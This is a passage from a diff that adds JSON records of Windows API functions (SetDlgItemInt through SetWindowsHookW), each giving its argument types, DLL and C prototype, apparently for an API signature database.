VOID * lpvBits, CONST BITMAPINFO * lpbmi, UINT fuColorUse);" + }, + { + "function_name": "SetDlgItemInt", + "arguments": [ + "HWND", + "int", + "UINT", + "BOOL" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL SetDlgItemInt(HWND hwndDlg, int idControl, UINT uValue, BOOL fSigned);" + }, + { + "function_name": "SetDlgItemTextA", + "arguments": [ + "HWND", + "int", + "LPCTSTR" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL SetDlgItemTextA(HWND hwndDlg,int idControl, LPCTSTR lpsz);" + }, + { + "function_name": "SetDlgItemTextW", + "arguments": [ + "HWND", + "int", + "LPCWSTR" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL SetDlgItemTextW(HWND hwndDlg,int idControl, LPCWSTR lpsz);" + }, + { + "function_name": "SetDoubleClickTime", + "arguments": [ + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL SetDoubleClickTime(UINT uInterval);" + }, + { + "function_name": "SetEndOfFile", + "arguments": [ + "HANDLE" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL SetEndOfFile(HANDLE hFile);" + }, + { + "function_name": "SetEnhMetaFileBits", + "arguments": [ + "UINT", + "CONST BYTE *" + ], + "dll_name": "gdi32.dll", + "full_prototype": "HENHMETAFILE SetEnhMetaFileBits(UINT cbBuffer, CONST BYTE * lpData);" + }, + { + "function_name": "SetEnvironmentVariableA", + "arguments": [ + "LPCTSTR", + "LPCTSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL SetEnvironmentVariableA(LPCTSTR lpszName, LPCTSTR lpszValue);" + }, + { + "function_name": "SetEnvironmentVariableW", + "arguments": [ + "LPCWSTR", + "LPCWSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL SetEnvironmentVariableW(LPCWSTR lpszName, LPCWSTR lpszValue);" + }, + { + "function_name": "SetErrorMode", + "arguments": [ + "UINT" + ], + "dll_name": "kernel32.dll", + "full_prototype": "UINT SetErrorMode(UINT fuErrorMode);" + }, + { + "function_name": "SetEvent", + "arguments": [ + "HANDLE" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL SetEvent(HANDLE hEvent);" + }, + { + "function_name": "SetFileApisToANSI", + "arguments": [ + "" + ], + "dll_name": "kernel32.dll", + "full_prototype": "VOID SetFileApisToANSI(VOID);" + }, + { + "function_name": "SetFileApisToOEM", + "arguments": [ + "" + ], + "dll_name": "kernel32.dll", + "full_prototype": "VOID SetFileApisToOEM(VOID);" + }, + { + "function_name": "SetFileAttributesA", + "arguments": [ + "LPCTSTR", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL SetFileAttributesA(LPCTSTR lpFileName, DWORD dwFileAttributes);" + }, + { + "function_name": "SetFileAttributesW", + "arguments": [ + "LPCWSTR", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL SetFileAttributesW(LPCWSTR lpFileName, DWORD dwFileAttributes);" + }, + { + "function_name": "SetFilePointer", + "arguments": [ + "HANDLE", + "LONG", + "PLONG", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD SetFilePointer(HANDLE hFile,LONG lDistanceToMove, PLONG lpDistanceToMoveHigh, DWORD dwMoveMethod);" + }, + { + "function_name": "SetFileSecurityA", + "arguments": [ + "LPCTSTR", + "SECURITY_INFORMATION", + "PSECURITY_DESCRIPTOR" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL SetFileSecurityA( LPCTSTR lpszFile, SECURITY_INFORMATION si, PSECURITY_DESCRIPTOR psd );" + }, + { + "function_name": "SetFileSecurityW", + "arguments": [ + "LPCWSTR", + "SECURITY_INFORMATION", + "PSECURITY_DESCRIPTOR" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL SetFileSecurityW( LPCWSTR lpFileName, SECURITY_INFORMATION RequestedInformation, PSECURITY_DESCRIPTOR pSecurityDescriptor );" + }, + { + "function_name": "SetFileTime", + "arguments": [ + "HANDLE", + "CONST FILETIME *", + "CONST FILETIME *", + "CONST FILETIME *" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL SetFileTime(HANDLE hFile, CONST FILETIME * lpftCreation, CONST FILETIME * lpftLastAccess,CONST FILETIME * lpftLastWrite);" + }, + { + "function_name": "SetFocus", + "arguments": [ + "HWND" + ], + "dll_name": "user32.dll", + "full_prototype": "HWND SetFocus(HWND hwnd);" + }, + { + "function_name": "SetForegroundWindow", + "arguments": [ + "HWND" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL SetForegroundWindow(HWND hwnd);" + }, + { + "function_name": "SetGraphicsMode", + "arguments": [ + "HDC", + "int" + ], + "dll_name": "gdi32.dll", + "full_prototype": "int SetGraphicsMode(HDC hdc, int iMode);" + }, + { + "function_name": "SetHandleCount", + "arguments": [ + "UINT" + ], + "dll_name": "kernel32.dll", + "full_prototype": "UINT SetHandleCount(UINT cHandles);" + }, + { + "function_name": "SetHandleInformation", + "arguments": [ + "HANDLE", + "DWORD", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL SetHandleInformation(HANDLE hObject, DWORD dwMask, DWORD dwFlags);" + }, + { + "function_name": "SetICMMode", + "arguments": [ + "HDC", + "int" + ], + "dll_name": "gdi32.dll", + "full_prototype": "int SetICMMode(HDC hdc, int fICM);" + }, + { + "function_name": "SetICMProfileA", + "arguments": [ + "HDC", + "LPTSTR" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL SetICMProfileA(HDC hdc, LPTSTR lpFileName);" + }, + { + "function_name": "SetICMProfileW", + "arguments": [ + "HDC", + "LPWSTR" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL SetICMProfileW(HDC hdc, LPWSTR lpFileName);" + }, + { + "function_name": "SetJobA", + "arguments": [ + "HANDLE", + "DWORD", + "DWORD", + "LPBYTE", + "DWORD" + ], + "dll_name": "winspool.drv", + "full_prototype": "BOOL SetJobA(HANDLE hPrinter, DWORD dwJob, DWORD dwLevel, LPBYTE lpbJob, DWORD dwCommand);" + }, + { + "function_name": "SetKeyboardState", + "arguments": [ + "LPBYTE" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL SetKeyboardState(LPBYTE lpbKeyState);" + }, + { + "function_name": "SetKernelObjectSecurity", + "arguments": [ + "HANDLE", + "SECURITY_INFORMATION", + "PSECURITY_DESCRIPTOR" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL SetKernelObjectSecurity( HANDLE hObject, SECURITY_INFORMATION si, PSECURITY_DESCRIPTOR psd );" + }, + { + "function_name": "SetLastError", + "arguments": [ + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "VOID SetLastError(DWORD fdwError);" + }, + { + "function_name": "SetLastErrorEx", + "arguments": [ + "DWORD", + "DWORD" + ], + "dll_name": "user32.dll", + "full_prototype": "VOID SetLastErrorEx(DWORD fdwError, DWORD fdwType);" + }, + { + "function_name": "SetLocalTime", + "arguments": [ + "CONST SYSTEMTIME *" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL SetLocalTime(CONST SYSTEMTIME * lpst);" + }, + { + "function_name": "SetLocaleInfoA", + "arguments": [ + "LCID", + "LCTYPE", + "LPCTSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL SetLocaleInfoA(LCID Locale, LCTYPE LCType,LPCTSTR lpLCData);" + }, + { + "function_name": "SetLocaleInfoW", + "arguments": [ + "LCID", + "LCTYPE", + "LPCWSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL SetLocaleInfoW(LCID lcid, LCTYPE lctype, LPCWSTR data);" + }, + { + "function_name": "SetMailslotInfo", + "arguments": [ + "HANDLE", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL SetMailslotInfo(HANDLE hMailslot, DWORD dwReadTimeout);" + }, + { + "function_name": "SetMapMode", + "arguments": [ + "HDC", + "int" + ], + "dll_name": "gdi32.dll", + "full_prototype": "int SetMapMode(HDC hdc, int fnMapMode);" + }, + { + "function_name": "SetMapperFlags", + "arguments": [ + "HDC", + "DWORD" + ], + "dll_name": "gdi32.dll", + "full_prototype": "DWORD SetMapperFlags(HDC hdc, DWORD dwFlag);" + }, + { + "function_name": "SetMenu", + "arguments": [ + "HWND", + "HMENU" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL SetMenu(HWND hwnd, HMENU hmenu);" + }, + { + "function_name": "SetMenuContextHelpId", + "arguments": [ + "HMENU", + "DWORD" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL SetMenuContextHelpId(HMENU hmenu, DWORD dwContextHelpId);" + }, + { + "function_name": "SetMenuDefaultItem", + "arguments": [ + "HMENU", + "UINT", + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL SetMenuDefaultItem(HMENU hMenu, UINT uItem, UINT fByPos);" + }, + { + "function_name": "SetMenuItemBitmaps", + "arguments": [ + "HMENU", + "UINT", + "UINT", + "HBITMAP", + "HBITMAP" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL SetMenuItemBitmaps(HMENU hmenu, UINT uItem, UINT fuFlags, HBITMAP hbmUnchecked, HBITMAP hbmChecked);" + }, + { + "function_name": "SetMenuItemInfoA", + "arguments": [ + "HMENU", + "UINT", + "BOOL", + "LPMENUITEMINFO" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL SetMenuItemInfoA(HMENU hMenu, UINT uItem, BOOL fByPosition, LPMENUITEMINFO lpmii);" + }, + { + "function_name": "SetMenuItemInfoW", + "arguments": [ + "HMENU", + "UINT", + "BOOL", + "LPCMENUITEMINFOW" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL SetMenuItemInfoW(HMENU hMenu, UINT uItem, BOOL fByPosition, LPCMENUITEMINFOW lpmii);" + }, + { + "function_name": "SetMessageQueue", + "arguments": [ + "int" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL SetMessageQueue(int cMessagesMax);" + }, + { + "function_name": "SetMetaFileBitsEx", + "arguments": [ + "UINT", + "CONST BYTE *" + ], + "dll_name": "gdi32.dll", + "full_prototype": "HMETAFILE SetMetaFileBitsEx(UINT nSize, CONST BYTE * lpData);" + }, + { + "function_name": "SetMetaRgn", + "arguments": [ + "HDC" + ], + "dll_name": "gdi32.dll", + "full_prototype": "int SetMetaRgn(HDC hdc);" + }, + { + "function_name": "SetMiterLimit", + "arguments": [ + "HDC", + "FLOAT", + "PFLOAT" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL SetMiterLimit(HDC hdc, FLOAT eNewLimit, PFLOAT peOldLimit);" + }, + { + "function_name": "SetNamedPipeHandleState", + "arguments": [ + "HANDLE", + "LPDWORD", + "LPDWORD", + "LPDWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL SetNamedPipeHandleState(HANDLE hNamedPipe, LPDWORD lpdwMode, LPDWORD lpcbMaxCollect, LPDWORD lpdwCollectDataTimeout);" + }, + { + "function_name": "SetPaletteEntries", + "arguments": [ + "HPALETTE", + "UINT", + "UINT", + "CONST PALETTEENTRY" + ], + "dll_name": "gdi32.dll", + "full_prototype": "UINT SetPaletteEntries(HPALETTE hpal, UINT iStart, UINT cEntries, CONST PALETTEENTRY *lppe);" + }, + { + "function_name": "SetParent", + "arguments": [ + "HWND", + "HWND" + ], + "dll_name": "user32.dll", + "full_prototype": "HWND SetParent(HWND hwndChild, HWND hwndNewParent);" + }, + { + "function_name": "SetPixel", + "arguments": [ + "HDC", + "int", + "int", + "COLORREF" + ], + "dll_name": "gdi32.dll", + "full_prototype": "COLORREF SetPixel(HDC hdc, int X, int Y, COLORREF crColor);" + }, + { + "function_name": "SetPixelFormat", + "arguments": [ + "HDC", + "int", + "const PIXELFORMATDESCRIPTOR" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL SetPixelFormat(HDC hdc, int iPixelFormat, const PIXELFORMATDESCRIPTOR *ppfd);" + }, + { + "function_name": "SetPixelV", + "arguments": [ + "HDC", + "int", + "int", + "COLORREF" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL SetPixelV(HDC hdc, int X, int Y, COLORREF crColor);" + }, + { + "function_name": "SetPolyFillMode", + "arguments": [ + "HDC", + "int" + ], + "dll_name": "gdi32.dll", + "full_prototype": "int SetPolyFillMode(HDC hdc, int iPolyFillMode);" + }, + { + "function_name": "SetPrinterA", + "arguments": [ + "HANDLE", + "DWORD", + "LPBYTE", + "DWORD" + ], + "dll_name": "winspool.drv", + "full_prototype": "BOOL SetPrinterA(HANDLE hPrinter, DWORD dwLevel, LPBYTE lpbPrinter, DWORD dwCommand);" + }, + { + "function_name": "SetPriorityClass", + "arguments": [ + "HANDLE", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL SetPriorityClass(HANDLE hProcess,DWORD fdwPriority);" + }, + { + "function_name": "SetPrivateObjectSecurity", + "arguments": [ + "SECURITY_INFORMATION", + "PSECURITY_DESCRIPTOR", + "PSECURITY_DESCRIPTOR", + "PGENERIC_MAPPING", + "HANDLE" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL SetPrivateObjectSecurity( SECURITY_INFORMATION si, PSECURITY_DESCRIPTOR psdSource, PSECURITY_DESCRIPTOR *lppsdTarget, PGENERIC_MAPPING pgm, HANDLE hClientToken );" + }, + { + "function_name": "SetProcessAffinityMask", + "arguments": [ + "HANDLE", + "DWORD_PTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL SetProcessAffinityMask(HANDLE hProcess, DWORD_PTR dwProcessAffinityMask);" + }, + { + "function_name": "SetProcessPriorityBoost", + "arguments": [ + "HANDLE", + "BOOL" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL SetProcessPriorityBoost(HANDLE hProcess, BOOL DisablePriorityBoost);" + }, + { + "function_name": "SetProcessShutdownParameters", + "arguments": [ + "DWORD", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL SetProcessShutdownParameters(DWORD dwLevel, DWORD dwFlags);" + }, + { + "function_name": "SetProcessWindowStation", + "arguments": [ + "HWINSTA" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL SetProcessWindowStation(HWINSTA hWinSta);" + }, + { + "function_name": "SetProcessWorkingSetSize", + "arguments": [ + "HANDLE", + "DWORD", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL SetProcessWorkingSetSize(HANDLE hProcess,DWORD dwMinimumWorkingSetSize, DWORD dwMaximumWorkingSetSize);" + }, + { + "function_name": "SetPropA", + "arguments": [ + "HWND", + "LPCTSTR", + "HANDLE" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL SetPropA(HWND hwnd, LPCTSTR lpsz, HANDLE hData);" + }, + { + "function_name": "SetPropW", + "arguments": [ + "HWND", + "LPCWSTR", + "HANDLE" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL SetPropW(HWND hwnd, LPCWSTR lpsz, HANDLE hData);" + }, + { + "function_name": "SetRect", + "arguments": [ + "LPRECT", + "int", + "int", + "int", + "int" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL SetRect(LPRECT lprc, int nLeft, int nTop, int nRight, int nBottom);" + }, + { + "function_name": "SetRectEmpty", + "arguments": [ + "LPRECT" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL SetRectEmpty(LPRECT lprc);" + }, + { + "function_name": "SetRectRgn", + "arguments": [ + "HRGN", + "int", + "int", + "int", + "int" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL SetRectRgn(HRGN hrgn, int nLeftRect, int nTopRect,int nRightRect, int nBottomRect);" + }, + { + "function_name": "SetROP2", + "arguments": [ + "HDC", + "int" + ], + "dll_name": "gdi32.dll", + "full_prototype": "int SetROP2(HDC hdc, int fnDrawMode);" + }, + { + "function_name": "SetScrollInfo", + "arguments": [ + "HWND", + "int", + "LPSCROLLINFO", + "BOOL" + ], + "dll_name": "user32.dll", + "full_prototype": "int SetScrollInfo(HWND hwnd, int fnBar, LPSCROLLINFO lpsi, BOOL fRedraw);" + }, + { + "function_name": "SetScrollPos", + "arguments": [ + "HWND", + "int", + "int", + "BOOL" + ], + "dll_name": "user32.dll", + "full_prototype": "int SetScrollPos(HWND hwnd, int fnBar, int nPos, BOOL fRedraw);" + }, + { + "function_name": "SetScrollRange", + "arguments": [ + "HWND", + "int", + "int", + "int", + "BOOL" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL SetScrollRange(HWND hwnd, int fnBar, int nMinPos, int nMaxPos, BOOL fRedraw);" + }, + { + "function_name": "SetSecurityDescriptorDacl", + "arguments": [ + "PSECURITY_DESCRIPTOR", + "BOOL", + "PACL", + "BOOL" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL SetSecurityDescriptorDacl( PSECURITY_DESCRIPTOR psd, BOOL fDaclPresent, PACL pAcl, BOOL fDaclDefaulted );" + }, + { + "function_name": "SetSecurityDescriptorGroup", + "arguments": [ + "PSECURITY_DESCRIPTOR", + "PSID", + "BOOL" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL SetSecurityDescriptorGroup( PSECURITY_DESCRIPTOR psd, PSID psidGroup, BOOL fGroupDefaulted );" + }, + { + "function_name": "SetSecurityDescriptorOwner", + "arguments": [ + "PSECURITY_DESCRIPTOR", + "PSID", + "BOOL" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL SetSecurityDescriptorOwner( PSECURITY_DESCRIPTOR psd, PSID psidOwner, BOOL fOwnerDefaulted );" + }, + { + "function_name": "SetSecurityDescriptorSacl", + "arguments": [ + "PSECURITY_DESCRIPTOR", + "BOOL", + "PACL", + "BOOL" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL SetSecurityDescriptorSacl( PSECURITY_DESCRIPTOR psd, BOOL fSaclPresent, PACL pAcl, BOOL fSaclDefaulted );" + }, + { + "function_name": "SetStdHandle", + "arguments": [ + "DWORD", + "HANDLE" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL SetStdHandle(DWORD IDStdHandle, HANDLE hHandle);" + }, + { + "function_name": "SetStretchBltMode", + "arguments": [ + "HDC", + "int" + ], + "dll_name": "gdi32.dll", + "full_prototype": "int SetStretchBltMode(HDC hdc, int iStretchMode);" + }, + { + "function_name": "SetSysColors", + "arguments": [ + "int", + "CONST INT", + "CONST COLORREF" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL WINAPI SetSysColors(int cDspElements, CONST INT *lpnDspElements, CONST COLORREF *lpdwRgbValues);" + }, + { + "function_name": "SetSystemCursor", + "arguments": [ + "HCURSOR", + "DWORD" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL SetSystemCursor(HCURSOR hCursor, DWORD dwCursorID);" + }, + { + "function_name": "SetSystemPaletteUse", + "arguments": [ + "HDC", + "UINT" + ], + "dll_name": "gdi32.dll", + "full_prototype": "UINT SetSystemPaletteUse(HDC hdc, UINT uUsage);" + }, + { + "function_name": "SetSystemPowerState", + "arguments": [ + "BOOL", + "BOOL" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL SetSystemPowerState(BOOL fSuspend, BOOL fForce);" + }, + { + "function_name": "SetSystemTime", + "arguments": [ + "CONST SYSTEMTIME *" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL SetSystemTime(CONST SYSTEMTIME * lpst);" + }, + { + "function_name": "SetSystemTimeAdjustment", + "arguments": [ + "DWORD", + "PBOOL" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL SetSystemTimeAdjustment(DWORD dwTimeAdjustment, PBOOL bTimeAdjustmentDisabled);" + }, + { + "function_name": "SetTapeParameters", + "arguments": [ + "HANDLE", + "DWORD", + "LPVOID" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD SetTapeParameters(HANDLE hDevice, DWORD dwOperation, LPVOID lpTapeInformation);" + }, + { + "function_name": "SetTapePosition", + "arguments": [ + "HANDLE", + "DWORD", + "DWORD", + "DWORD", + "DWORD", + "BOOL" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD SetTapePosition(HANDLE hDevice,DWORD dwPositionMethod,DWORD dwPartition, DWORD dwOffsetLow, DWORD dwOffsetHigh, BOOL bImmediate);" + }, + { + "function_name": "SetTextAlign", + "arguments": [ + "HDC", + "UINT" + ], + "dll_name": "gdi32.dll", + "full_prototype": "UINT SetTextAlign(HDC hdc,UINT fMode);" + }, + { + "function_name": "SetTextColor", + "arguments": [ + "HDC", + "COLORREF" + ], + "dll_name": "gdi32.dll", + "full_prototype": "COLORREF SetTextColor(HDC hdc, COLORREF crColor);" + }, + { + "function_name": "SetTextCharacterExtra", + "arguments": [ + "HDC", + "int" + ], + "dll_name": "gdi32.dll", + "full_prototype": "int SetTextCharacterExtra(HDC hdc,int nCharExtra);" + }, + { + "function_name": "SetTextJustification", + "arguments": [ + "HDC", + "int", + "int" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL SetTextJustification(HDC hdc,int nBreakExtra,int nBreakCount);" + }, + { + "function_name": "SetThreadAffinityMask", + "arguments": [ + "HANDLE", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD SetThreadAffinityMask(HANDLE hThread, DWORD dwThreadAffinityMask);" + }, + { + "function_name": "SetThreadContext", + "arguments": [ + "HANDLE", + "CONST CONTEXT *" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL SetThreadContext(HANDLE hThread,CONST CONTEXT * lpContext);" + }, + { + "function_name": "SetThreadDesktop", + "arguments": [ + "HDESK" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL SetThreadDesktop(HDESK hDesk);" + }, + { + "function_name": "SetThreadIdealProcessor", + "arguments": [ + "HANDLE", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD SetThreadIdealProcessor(HANDLE hThread, DWORD dwIdealProcessor);" + }, + { + "function_name": "SetThreadLocale", + "arguments": [ + "LCID" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL SetThreadLocale(LCID Locale);" + }, + { + "function_name": "SetThreadPriority", + "arguments": [ + "HANDLE", + "int" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL SetThreadPriority(HANDLE hThread,int nPriority);" + }, + { + "function_name": "SetThreadPriorityBoost", + "arguments": [ + "HANDLE", + "BOOL" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL SetThreadPriorityBoost(HANDLE hThread, BOOL DisablePriorityBoost);" + }, + { + "function_name": "SetThreadToken", + "arguments": [ + "PHANDLE", + "HANDLE" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL SetThreadToken( PHANDLE Thread, HANDLE Token );" + }, + { + "function_name": "SetTimer", + "arguments": [ + "HWND", + "UINT", + "UINT", + "TIMERPROC" + ], + "dll_name": "user32.dll", + "full_prototype": "UINT SetTimer(HWND hwnd, UINT idTimer, UINT uTimeout, TIMERPROC tmprc);" + }, + { + "function_name": "SetTimeZoneInformation", + "arguments": [ + "CONST TIME_ZONE_INFORMATION *" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL SetTimeZoneInformation(CONST TIME_ZONE_INFORMATION * lptzi);" + }, + { + "function_name": "SetTokenInformation", + "arguments": [ + "HANDLE", + "TOKEN_INFORMATION_CLASS", + "LPVOID", + "DWORD" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL SetTokenInformation( HANDLE hToken, TOKEN_INFORMATION_CLASS tic, LPVOID lpvInformation, DWORD cbInformation );" + }, + { + "function_name": "SetUnhandledExceptionFilter", + "arguments": [ + "LPTOP_LEVEL_EXCEPTION_FILTER" + ], + "dll_name": "kernel32.dll", + "full_prototype": "LPTOP_LEVEL_EXCEPTION_FILTER SetUnhandledExceptionFilter(LPTOP_LEVEL_EXCEPTION_FILTER lpTopLevelExceptionFilter);" + }, + { + "function_name": "SetupComm", + "arguments": [ + "HANDLE", + "DWORD", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL SetupComm(HANDLE hCommDev, DWORD cbInQueue, DWORD cbOutQueue);" + }, + { + "function_name": "SetupCopyErrorA", + "arguments": [ + "HWND", + "PCTSTR", + "PCTSTR", + "PCTSTR", + "PCTSTR", + "PCTSTR", + "UINT", + "DWORD", + "PTSTR", + "DWORD", + "PDWORD" + ], + "dll_name": "setupapi.dll", + "full_prototype": "UINT SetupCopyErrorA( HWND hwndParent, PCTSTR DialogTitle, PCTSTR DiskName, PCTSTR PathToSource, PCTSTR SourceFile, PCTSTR TargetPathFile, UINT Win32ErrorCode, DWORD Style, PTSTR PathBuffer, DWORD PathBufferSize, PDWORD PathRequiredSize);" + }, + { + "function_name": "SetupDeleteErrorA", + "arguments": [ + "HWND", + "PCTSTR", + "PCTSTR", + "UINT", + "DWORD" + ], + "dll_name": "setupapi.dll", + "full_prototype": "UINT SetupDeleteErrorA( HWND hwndParent, PCTSTR DialogTitle, PCTSTR File, UINT Win32ErrorCode, DWORD Style);" + }, + { + "function_name": "SetUserObjectInformationA", + "arguments": [ + "HANDLE", + "int", + "PVOID", + "DWORD" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL SetUserObjectInformationA(HANDLE hObject, int nIndex, PVOID lpvInfo, DWORD cbInfo);" + }, + { + "function_name": "SetUserObjectInformationW", + "arguments": [ + "HANDLE", + "int", + "PVOID", + "DWORD" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL SetUserObjectInformationW(HANDLE hObject, int nIndex, PVOID lpvInfo, DWORD cbInfo);" + }, + { + "function_name": "SetUserObjectSecurity", + "arguments": [ + "HANDLE", + "PSECURITY_INFORMATION", + "PSECURITY_DESCRIPTOR" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL SetUserObjectSecurity(HANDLE hObject,PSECURITY_INFORMATION psi, PSECURITY_DESCRIPTOR psd);" + }, + { + "function_name": "SetViewportExtEx", + "arguments": [ + "HDC", + "int", + "int", + "LPSIZE" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL SetViewportExtEx(HDC hdc, int nXExtent, int nYExtent, LPSIZE lpSize);" + }, + { + "function_name": "SetViewportOrgEx", + "arguments": [ + "HDC", + "int", + "int", + "LPPOINT" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL SetViewportOrgEx(HDC hdc,int X, int Y, LPPOINT lpPoint);" + }, + { + "function_name": "SetVolumeLabelA", + "arguments": [ + "LPCTSTR", + "LPCTSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL SetVolumeLabelA(LPCTSTR lpRootPathName, LPCTSTR lpVolumeName);" + }, + { + "function_name": "SetVolumeLabelW", + "arguments": [ + "LPCWSTR", + "PCWSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL SetVolumeLabelW(LPCWSTR lpRootPathName, PCWSTR lpVolumeName);" + }, + { + "function_name": "SetWaitableTimer", + "arguments": [ + "HANDLE", + "const LARGE_INTEGER", + "LONG", + "PTIMERAPCROUTINE", + "LPVOID", + "BOOL" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL SetWaitableTimer(HANDLE hTimer, const LARGE_INTEGER *pDueTime, LONG lPeriod, PTIMERAPCROUTINE pfnCompletionRoutine, LPVOID lpArgToCompletionRoutine, BOOL fResume);" + }, + { + "function_name": "SetWindowContextHelpId", + "arguments": [ + "HWND", + "DWORD" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL SetWindowContextHelpId(HWND hwnd,DWORD dwContextHelpId);" + }, + { + "function_name": "SetWindowLongA", + "arguments": [ + "HWND", + "int", + "LONG" + ], + "dll_name": "user32.dll", + "full_prototype": "LONG SetWindowLongA(HWND hwnd, int nIndex, LONG lNewLong);" + }, + { + "function_name": "SetWindowLongW", + "arguments": [ + "HWND", + "int", + "LONG" + ], + "dll_name": "user32.dll", + "full_prototype": "LONG SetWindowLongW(HWND hwnd, int nIndex, LONG lNewLong);" + }, + { + "function_name": "SetWindowPlacement", + "arguments": [ + "HWND", + "CONST WINDOWPLACEMENT *" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL SetWindowPlacement(HWND hwnd,CONST WINDOWPLACEMENT * lpwndpl);" + }, + { + "function_name": "SetWindowPos", + "arguments": [ + "HWND", + "HWND", + "int", + "int", + "int", + "int", + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL SetWindowPos(HWND hwnd, HWND hwndInsertAfter, int x, int y, int cx, int cy, UINT fuFlags);" + }, + { + "function_name": "SetWindowRgn", + "arguments": [ + "HWND", + "HRGN", + "BOOL" + ], + "dll_name": "user32.dll", + "full_prototype": "int SetWindowRgn(HWND hWnd, HRGN hRgn, BOOL bRedraw);" + }, + { + "function_name": "SetWindowsHookA", + "arguments": [ + "int", + "HOOKPROC" + ], + "dll_name": "user32.dll", + "full_prototype": "HHOOK SetWindowsHookA(int idHook, HOOKPROC hkprc);" + }, + { + "function_name": "SetWindowsHookExA", + "arguments": [ + "int", + "HOOKPROC", + "HINSTANCE", + "DWORD" + ], + "dll_name": "user32.dll", + "full_prototype": "HHOOK SetWindowsHookExA(int idHook, HOOKPROC hkprc, HINSTANCE hMod, DWORD dwThreadID);" + }, + { + "function_name": "SetWindowsHookExW", + "arguments": [ + "int", + "HOOKPROC", + "HINSTANCE", + "DWORD" + ], + "dll_name": "user32.dll", + "full_prototype": "HHOOK SetWindowsHookExW(int idHook, HOOKPROC hkprc, HINSTANCE hMod, DWORD dwThreadID);" + }, + { + "function_name": "SetWindowsHookW", + "arguments": [ + "int", + "HOOKPROC" + ], + "dll_name": "user32.dll", + "full_prototype": "HHOOK SetWindowsHookW(int idHook, HOOKPROC hkprc);" 